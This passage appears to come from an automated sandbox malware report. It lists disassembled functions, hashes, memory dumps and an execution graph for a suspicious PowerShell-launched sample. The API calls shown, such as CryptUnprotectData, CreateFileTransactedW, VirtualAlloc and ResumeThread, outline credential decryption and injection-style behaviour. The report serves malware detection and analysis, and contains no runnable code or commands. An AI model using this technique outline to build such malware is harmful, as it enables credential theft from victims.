                                                                                                                                                                    • Opcode Fuzzy Hash: 1b8f70b141e364faf8f90345c1eea65e332c8786bae4699b5a7b2299d9fd1c57
                                                                                                                                                                    • Instruction Fuzzy Hash: AF412B71A0DA888FDF189F5C580A6A87FE1FB59710F5481AFE458C3293DA24B94587C2
                                                                                                                                                                    Function 00007FFD9B77E620 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2665627606.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b77d000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 48da377cfb43f58dc8467bd0170170a0e922031bb2597457e1ba3db9cb23ea2d
                                                                                                                                                                    • Instruction ID: 679591852f414d2dc5f1fcf1e428a41e2eb3bc158556fabdec95d9ea09c466d1
                                                                                                                                                                    • Opcode Fuzzy Hash: 48da377cfb43f58dc8467bd0170170a0e922031bb2597457e1ba3db9cb23ea2d
                                                                                                                                                                    • Instruction Fuzzy Hash: 8C41367140EBC44FE756CB28D8959523FF0EF52320B1A06DFD088CB1B3D625A846C7A2
                                                                                                                                                                    Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                    • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                    • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                                                                                    Function 00007FFD9B96414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2679165704.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9488c1f461d2e22cdc15f909aa9f0a3f2dc3c9a89997f8647269a8befdd5599a
                                                                                                                                                                    • Instruction ID: ce3c2869b2a5237184f9773489b9cb6a4cb2315893c88ecc26a038e8ce54e9ce
                                                                                                                                                                    • Opcode Fuzzy Hash: 9488c1f461d2e22cdc15f909aa9f0a3f2dc3c9a89997f8647269a8befdd5599a
                                                                                                                                                                    • Instruction Fuzzy Hash: 3DF0E232B0E5098FD768EB9CE4519E873E0EF6532071640BAE06DC72B3CA25EC40C781
                                                                                                                                                                    Function 00007FFD9B964400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2679165704.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4e9b869d45d93e5b1dd0e7403f1555631e9909b8fb19cc1612e1949d2808535f
                                                                                                                                                                    • Instruction ID: 9312d69b85f88b27fb14f6c025b8b8d9dafe08719cba1ba7e4be70795416134c
                                                                                                                                                                    • Opcode Fuzzy Hash: 4e9b869d45d93e5b1dd0e7403f1555631e9909b8fb19cc1612e1949d2808535f
                                                                                                                                                                    • Instruction Fuzzy Hash: 3BF0BE32A0E5498FD765EB9CE0619A873E0EF0532075600BAE05DCB1A3CA26AC40CB40
                                                                                                                                                                    Function 00007FFD9B9641D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2679165704.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                                                                                                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80
                                                                                                                                                                    Function 00007FFD9B89A2C9 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1c840c991501e7be4669e7a91bf308631d9dfef5bc329dba03eb946d8fe00010
                                                                                                                                                                    • Instruction ID: 8c9cddaed84f325c485bcda86a76cabf544e5b67ade7e48303af95b0bf5ab05c
                                                                                                                                                                    • Opcode Fuzzy Hash: 1c840c991501e7be4669e7a91bf308631d9dfef5bc329dba03eb946d8fe00010
                                                                                                                                                                    • Instruction Fuzzy Hash: 53E01234804A8C8F8B48EF18C8598E97BA0FF68201B01429BE81DC7520DB719A58CBC2

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00007FFD9B898BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                                                                                                    • API String ID: 0-1500707516
                                                                                                                                                                    • Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                                                                                    • Instruction ID: 698a88e157f5e3be547aa0b9edad8586613dc3d8c9d577c9a4451944f3587467
                                                                                                                                                                    • Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                                                                                    • Instruction Fuzzy Hash: DF21F6A7704466DED30A76ADBC189DC7380DB9427A38947F3E169CB583FD14A08746C0
                                                                                                                                                                    Function 00007FFD9B8989FA Relevance: 5.1, Strings: 4, Instructions: 108COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: M_^$M_^$M_^$M_^
                                                                                                                                                                    • API String ID: 0-1397233021
                                                                                                                                                                    • Opcode ID: 8290be27e745bd22f8594c4da34fe86a7ad81ec82dc56f9857c7d78c573c957c
                                                                                                                                                                    • Instruction ID: 37b81bfd84a26cf515a8a2bea6ef506d8cadddf451accf18210f7796012d23ab
                                                                                                                                                                    • Opcode Fuzzy Hash: 8290be27e745bd22f8594c4da34fe86a7ad81ec82dc56f9857c7d78c573c957c
                                                                                                                                                                    • Instruction Fuzzy Hash: 88319EA3B0FAC75BEB5A472948790997FE0FF6679874A43F6C0D48B0A3FD1568074242

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:14.2%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                    Signature Coverage:12.1%
                                                                                                                                                                    Total number of Nodes:33
                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                    execution_graph 28420 7ffd9b8ad2f5 28421 7ffd9b8ad36b WriteFile 28420->28421 28423 7ffd9b8ad48f 28421->28423 28424 7ffd9b8af0f5 28425 7ffd9b8af11f VirtualAlloc 28424->28425 28427 7ffd9b8af23f 28425->28427 28403 7ffd9b8ad04a 28404 7ffd9b8ad059 CreateFileTransactedW 28403->28404 28406 7ffd9b8ad268 28404->28406 28432 7ffd9b8ae6da 28435 7ffd9b8ae6eb 28432->28435 28433 7ffd9b8ae815 28439 7ffd9b8aec5a GetSystemInfo 28433->28439 28435->28433 28436 7ffd9b8ae822 28435->28436 28440 7ffd9b8aec5a GetSystemInfo 28436->28440 28438 7ffd9b8ae820 28439->28438 28440->28438 28407 7ffd9b8ab57d 28408 7ffd9b9116a0 28407->28408 28411 7ffd9b9107d0 28408->28411 28410 7ffd9b911789 28412 7ffd9b9107db 28411->28412 28414 7ffd9b91087e 28412->28414 28415 7ffd9b910897 28412->28415 28414->28410 28416 7ffd9b9108a2 28415->28416 28417 7ffd9b9108ea ResumeThread 28415->28417 28416->28414 28419 7ffd9b9109b4 28417->28419 28419->28414 28399 7ffd9bfb367e 28400 7ffd9bfb369a 28399->28400 28401 7ffd9bfb37a1 CryptUnprotectData 28400->28401 28402 7ffd9bfb38af 28401->28402 28428 7ffd9b8aec91 28429 7ffd9b8aec9e GetSystemInfo 28428->28429 28431 7ffd9b8aed85 28429->28431

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00007FFD9BFB367E Relevance: 1.8, APIs: 1, Instructions: 304encryptionCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1219 7ffd9bfb367e-7ffd9bfb36af 1222 7ffd9bfb370f-7ffd9bfb3739 1219->1222 1223 7ffd9bfb36b1-7ffd9bfb370e call 7ffd9bfb2190 1219->1223 1231 7ffd9bfb373b 1222->1231 1232 7ffd9bfb373c-7ffd9bfb374d 1222->1232 1223->1222 1231->1232 1234 7ffd9bfb374f 1232->1234 1235 7ffd9bfb3750-7ffd9bfb38ad CryptUnprotectData 1232->1235 1234->1235 1238 7ffd9bfb38b5-7ffd9bfb3927 1235->1238 1239 7ffd9bfb38af 1235->1239 1239->1238
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3104521405.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9bfb0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 834300711-0
                                                                                                                                                                    • Opcode ID: 342680f2546a522dcdcc6e9af10500ac6cfde5bb71f4ae5813e7374b545142f8
                                                                                                                                                                    • Instruction ID: be2ff814b8c6feeaca96509f1215c1569d973810c561f342d905622b26c6dc1e
                                                                                                                                                                    • Opcode Fuzzy Hash: 342680f2546a522dcdcc6e9af10500ac6cfde5bb71f4ae5813e7374b545142f8
                                                                                                                                                                    • Instruction Fuzzy Hash: 68919170A08A5C8FDB98EF68C855BA9BBF1FF59310F1041AED04DD3292DA35A985CF41
                                                                                                                                                                    Function 00007FFD9BE7C688 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3093822961.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9be30000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4d6822307c4e5feb6718164df536ca7d50d2ae9bac683f5b5f575f3fa95a869f
                                                                                                                                                                    • Instruction ID: 319cb27de0dea55d084f939a32aa9085c1a5f79f2b7ba560a5cbfccd15d416bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 4d6822307c4e5feb6718164df536ca7d50d2ae9bac683f5b5f575f3fa95a869f
                                                                                                                                                                    • Instruction Fuzzy Hash: 69A1B570E15A1D8FDBA4EF58C8A5AE8B7B1FF58301F5001A9D41DE32A5DE356A81CF40
                                                                                                                                                                    Function 00007FFD9BA7C100 Relevance: 1.9, Strings: 1, Instructions: 682COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1076 7ffd9ba7c100-7ffd9ba7c11a 1077 7ffd9ba7c120-7ffd9ba7c130 1076->1077 1078 7ffd9ba7c71c-7ffd9ba7c72a 1076->1078 1079 7ffd9ba7c77a-7ffd9ba7c790 1077->1079 1080 7ffd9ba7c136-7ffd9ba7c171 1077->1080 1081 7ffd9ba7c731-7ffd9ba7c740 1078->1081 1082 7ffd9ba7c72c 1078->1082 1086 7ffd9ba7c792-7ffd9ba7c7b6 1079->1086 1087 7ffd9ba7c7da-7ffd9ba7c7ed 1079->1087 1085 7ffd9ba7c20a-7ffd9ba7c212 1080->1085 1082->1081 1088 7ffd9ba7c218 1085->1088 1089 7ffd9ba7c176-7ffd9ba7c17f 1085->1089 1090 7ffd9ba7c222-7ffd9ba7c23f 1088->1090 1089->1079 1091 7ffd9ba7c185-7ffd9ba7c190 1089->1091 1094 7ffd9ba7c246-7ffd9ba7c257 1090->1094 1092 7ffd9ba7c21a-7ffd9ba7c21e 1091->1092 1093 7ffd9ba7c196-7ffd9ba7c1aa 1091->1093 1092->1090 1095 7ffd9ba7c203-7ffd9ba7c207 1093->1095 1096 7ffd9ba7c1ac-7ffd9ba7c1c3 1093->1096 1101 7ffd9ba7c270-7ffd9ba7c27f 1094->1101 1102 7ffd9ba7c259-7ffd9ba7c26e 1094->1102 1095->1085 1096->1079 1097 7ffd9ba7c1c9-7ffd9ba7c1d5 1096->1097 1099 7ffd9ba7c1ef-7ffd9ba7c200 1097->1099 1100 7ffd9ba7c1d7-7ffd9ba7c1eb 1097->1100 1099->1095 1100->1096 1103 7ffd9ba7c1ed 1100->1103 1107 7ffd9ba7c2a1-7ffd9ba7c30e 1101->1107 1108 7ffd9ba7c281-7ffd9ba7c29c 1101->1108 1102->1101 1103->1095 1116 7ffd9ba7c310-7ffd9ba7c323 1107->1116 1117 7ffd9ba7c35f-7ffd9ba7c3a6 1107->1117 1114 7ffd9ba7c6d9-7ffd9ba7c6f9 1108->1114 1121 7ffd9ba7c6fd-7ffd9ba7c70a 1114->1121 1116->1079 1120 7ffd9ba7c329-7ffd9ba7c357 1116->1120 1126 7ffd9ba7c3aa-7ffd9ba7c3b0 1117->1126 1128 7ffd9ba7c358-7ffd9ba7c35d 1120->1128 1124 7ffd9ba7c70c-7ffd9ba7c716 1121->1124 1124->1077 1125 7ffd9ba7c71b 1124->1125 1125->1078 1130 7ffd9ba7c3ba-7ffd9ba7c3cb 1126->1130 1128->1116 1129 7ffd9ba7c35e 1128->1129 1129->1117 1131 7ffd9ba7c3cd-7ffd9ba7c3d1 1130->1131 1132 7ffd9ba7c43c-7ffd9ba7c44d 1130->1132 1131->1128 1135 7ffd9ba7c3d3 1131->1135 1133 7ffd9ba7c44e-7ffd9ba7c451 1132->1133 1136 7ffd9ba7c457-7ffd9ba7c45b 1133->1136 1137 7ffd9ba7c3fc-7ffd9ba7c40d 1135->1137 1138 7ffd9ba7c45d-7ffd9ba7c45f 1136->1138 1137->1136 1146 7ffd9ba7c40f-7ffd9ba7c41d 1137->1146 1139 7ffd9ba7c461-7ffd9ba7c46f 1138->1139 1140 7ffd9ba7c4a9-7ffd9ba7c4b1 1138->1140 1142 7ffd9ba7c471-7ffd9ba7c475 1139->1142 1143 7ffd9ba7c4e0-7ffd9ba7c4f5 1139->1143 1144 7ffd9ba7c4b3-7ffd9ba7c4bc 1140->1144 1145 7ffd9ba7c4fb-7ffd9ba7c503 1140->1145 1142->1137 1156 7ffd9ba7c477 1142->1156 1143->1145 1147 7ffd9ba7c4bf-7ffd9ba7c4c1 1144->1147 1151 7ffd9ba7c58b-7ffd9ba7c599 1145->1151 1152 7ffd9ba7c509-7ffd9ba7c522 1145->1152 1148 7ffd9ba7c41f-7ffd9ba7c423 1146->1148 1149 7ffd9ba7c48e-7ffd9ba7c4a3 1146->1149 1153 7ffd9ba7c4c3-7ffd9ba7c4c5 1147->1153 1154 7ffd9ba7c532-7ffd9ba7c534 1147->1154 1148->1126 1162 7ffd9ba7c425 1148->1162 1149->1140 1157 7ffd9ba7c59b-7ffd9ba7c59d 1151->1157 1158 7ffd9ba7c60a-7ffd9ba7c60b 1151->1158 1152->1151 1159 7ffd9ba7c524-7ffd9ba7c525 1152->1159 1160 7ffd9ba7c541-7ffd9ba7c545 1153->1160 1161 7ffd9ba7c4c7 1153->1161 1168 7ffd9ba7c535-7ffd9ba7c537 1154->1168 1156->1149 1164 7ffd9ba7c59f 1157->1164 1165 7ffd9ba7c619-7ffd9ba7c61b 1157->1165 1163 7ffd9ba7c63b-7ffd9ba7c63d 1158->1163 1166 7ffd9ba7c526-7ffd9ba7c531 1159->1166 1170 7ffd9ba7c5c1-7ffd9ba7c5db 1160->1170 1171 7ffd9ba7c547 1160->1171 1161->1133 1169 7ffd9ba7c4c9 1161->1169 1162->1132 1172 7ffd9ba7c63f 1163->1172 1173 7ffd9ba7c6ae-7ffd9ba7c6d7 1163->1173 1164->1166 1174 7ffd9ba7c5a1 1164->1174 1175 7ffd9ba7c61d-7ffd9ba7c61f 1165->1175 1176 7ffd9ba7c68c 1165->1176 1166->1154 1177 7ffd9ba7c5ad 1166->1177 1190 7ffd9ba7c5b8-7ffd9ba7c5c0 1168->1190 1191 7ffd9ba7c538 1168->1191 1181 7ffd9ba7c4ce-7ffd9ba7c4d4 1169->1181 1209 7ffd9ba7c60d-7ffd9ba7c616 1170->1209 1210 7ffd9ba7c5dd-7ffd9ba7c5eb 1170->1210 1171->1181 1182 7ffd9ba7c549 1171->1182 1183 7ffd9ba7c65c-7ffd9ba7c66a 1172->1183 1173->1114 1185 7ffd9ba7c5a8-7ffd9ba7c5ac 1174->1185 1186 7ffd9ba7c621 1175->1186 1187 7ffd9ba7c69b-7ffd9ba7c69f 1175->1187 1176->1121 1184 7ffd9ba7c68e-7ffd9ba7c690 1176->1184 1179 7ffd9ba7c62e 1177->1179 1180 7ffd9ba7c5ae 1177->1180 1194 7ffd9ba7c630 1179->1194 1195 7ffd9ba7c6aa-7ffd9ba7c6ad 1179->1195 1180->1168 1192 7ffd9ba7c5af-7ffd9ba7c5b0 1180->1192 1198 7ffd9ba7c550-7ffd9ba7c575 1181->1198 1208 7ffd9ba7c4d6 1181->1208 1182->1198 1200 7ffd9ba7c66b-7ffd9ba7c675 1183->1200 1184->1124 1201 7ffd9ba7c692 1184->1201 1185->1177 1188 7ffd9ba7c628-7ffd9ba7c62c 1185->1188 1186->1185 1189 7ffd9ba7c623 1186->1189 1187->1125 1193 7ffd9ba7c6a1 1187->1193 1188->1179 1189->1188 1190->1170 1191->1147 1203 7ffd9ba7c539-7ffd9ba7c53a 1191->1203 1192->1190 1193->1188 1207 7ffd9ba7c6a3 1193->1207 1204 7ffd9ba7c632-7ffd9ba7c63a 1194->1204 1205 7ffd9ba7c677-7ffd9ba7c68a 1194->1205 1195->1173 1215 7ffd9ba7c578-7ffd9ba7c589 1198->1215 1200->1205 1201->1165 1206 7ffd9ba7c694 1201->1206 1203->1160 1204->1163 1205->1176 1206->1187 1207->1195 1208->1138 1211 7ffd9ba7c4d8 1208->1211 1209->1165 1210->1183 1212 7ffd9ba7c5ed-7ffd9ba7c5ef 1210->1212 1211->1143 1212->1200 1217 7ffd9ba7c5f1 1212->1217 1215->1151 1215->1159 1217->1215 1218 7ffd9ba7c5f3 1217->1218 1218->1158
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3072198419.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9ba70000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: a/_L
                                                                                                                                                                    • API String ID: 0-3548775047
                                                                                                                                                                    • Opcode ID: ca22fb73f6574c1e5bb0eae1ebaa86f88c696e7779ccc1e7e072ebdf9930016b
                                                                                                                                                                    • Instruction ID: 3f869f5b65d04c919e6a429a575aed7ef1a087347d8cb6aeefafa87eae87692a
                                                                                                                                                                    • Opcode Fuzzy Hash: ca22fb73f6574c1e5bb0eae1ebaa86f88c696e7779ccc1e7e072ebdf9930016b
                                                                                                                                                                    • Instruction Fuzzy Hash: C4329630B1DA1D8FDBA8DB58C8A5A7977E1FF54314F5141B9D00EC72A2EE68AD41CB80
                                                                                                                                                                    Function 00007FFD9B8AD04A Relevance: 1.8, APIs: 1, Instructions: 293COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1331 7ffd9b8ad04a-7ffd9b8ad057 1332 7ffd9b8ad059-7ffd9b8ad061 1331->1332 1333 7ffd9b8ad062-7ffd9b8ad128 1331->1333 1332->1333 1337 7ffd9b8ad12a-7ffd9b8ad141 1333->1337 1338 7ffd9b8ad144-7ffd9b8ad266 CreateFileTransactedW 1333->1338 1337->1338 1339 7ffd9b8ad268 1338->1339 1340 7ffd9b8ad26e-7ffd9b8ad2f0 1338->1340 1339->1340
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3064756180.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8a0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFileTransacted
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2149338676-0
                                                                                                                                                                    • Opcode ID: 51f9dcfe1cb56373039c5a76da65090abbeea94f52533d81801c3cc0fc4693ad
                                                                                                                                                                    • Instruction ID: 34a34e2340a4c91d6b9944455931291424572b7ffa6e61900595fce71dd17054
                                                                                                                                                                    • Opcode Fuzzy Hash: 51f9dcfe1cb56373039c5a76da65090abbeea94f52533d81801c3cc0fc4693ad
                                                                                                                                                                    • Instruction Fuzzy Hash: 5E912370908A5D8FDB99DF58C894BE9BBF1FB6A310F1041AED04DE3291DB75A984CB04
                                                                                                                                                                    Function 00007FFD9B8AD2F5 Relevance: 1.7, APIs: 1, Instructions: 215fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1343 7ffd9b8ad2f5-7ffd9b8ad3c2 1346 7ffd9b8ad3ea-7ffd9b8ad48d WriteFile 1343->1346 1347 7ffd9b8ad3c4-7ffd9b8ad3e7 1343->1347 1348 7ffd9b8ad495-7ffd9b8ad4f1 1346->1348 1349 7ffd9b8ad48f 1346->1349 1347->1346 1349->1348
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3064756180.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8a0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                    • Opcode ID: c56ae549459ce3e2b1815b7d756ad4806908cae348920010eb958373ffbdab54
                                                                                                                                                                    • Instruction ID: 683446c97eb5fd3841a47725559ad015738361241fdce7333934ec30730d8db8
                                                                                                                                                                    • Opcode Fuzzy Hash: c56ae549459ce3e2b1815b7d756ad4806908cae348920010eb958373ffbdab54
                                                                                                                                                                    • Instruction Fuzzy Hash: 49610374A08A5C8FDB98DF58C895BE9BBF1FB69310F1041AED04DE3291DB74A985CB40
                                                                                                                                                                    Function 00007FFD9B8AEC5A Relevance: 1.7, APIs: 1, Instructions: 165COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1351 7ffd9b8aec5a-7ffd9b8aec63 1352 7ffd9b8aec65-7ffd9b8aec83 1351->1352 1353 7ffd9b8aecad 1351->1353 1357 7ffd9b8aec85-7ffd9b8aec8f 1352->1357 1358 7ffd9b8aec9e-7ffd9b8aecaa 1352->1358 1355 7ffd9b8aecaf 1353->1355 1356 7ffd9b8aecb0-7ffd9b8aed1a 1353->1356 1355->1356 1361 7ffd9b8aed22-7ffd9b8aed83 GetSystemInfo 1356->1361 1358->1353 1362 7ffd9b8aed85 1361->1362 1363 7ffd9b8aed8b-7ffd9b8aedbb 1361->1363 1362->1363
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000010.00000002.3064756180.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ffd9b8a0000_wnWNWNYIxJtFiUSDRXunzX.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                                    • Opcode ID: 258edfdb390cac67b2e71008379273879423800e31acd8ee226d0d3d966a55f8
                                                                                                                                                                    • Instruction ID: 2cfcf7829a2b7c183c00a1340122f1622910312fc4e1725899c98983855201de
                                                                                                                                                                    • Opcode Fuzzy Hash: 258edfdb390cac67b2e71008379273879423800e31acd8ee226d0d3d966a55f8
                                                                                                                                                                    • Instruction Fuzzy Hash: F151D030909A4C8FDB69DFA8D859AE9BBF0FF59310F1041AFD04DD72A2DA346946CB50
                                                                                                                                                                    Function 00007FFD9B910897 Relevance: 1.6, APIs: 1, Instructions: 149threadCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1366 7ffd9b910897-7ffd9b9108a0 1367 7ffd9b9108a2-7ffd9b9108c2 1366->1367 1368 7ffd9b9108ea-7ffd9b9109b2 ResumeThread 1366->1368 1372 7ffd9b9109b4 1368->1372 1373 7ffd9b9109ba-7ffd9b910a04 1368->1373 1372->1373
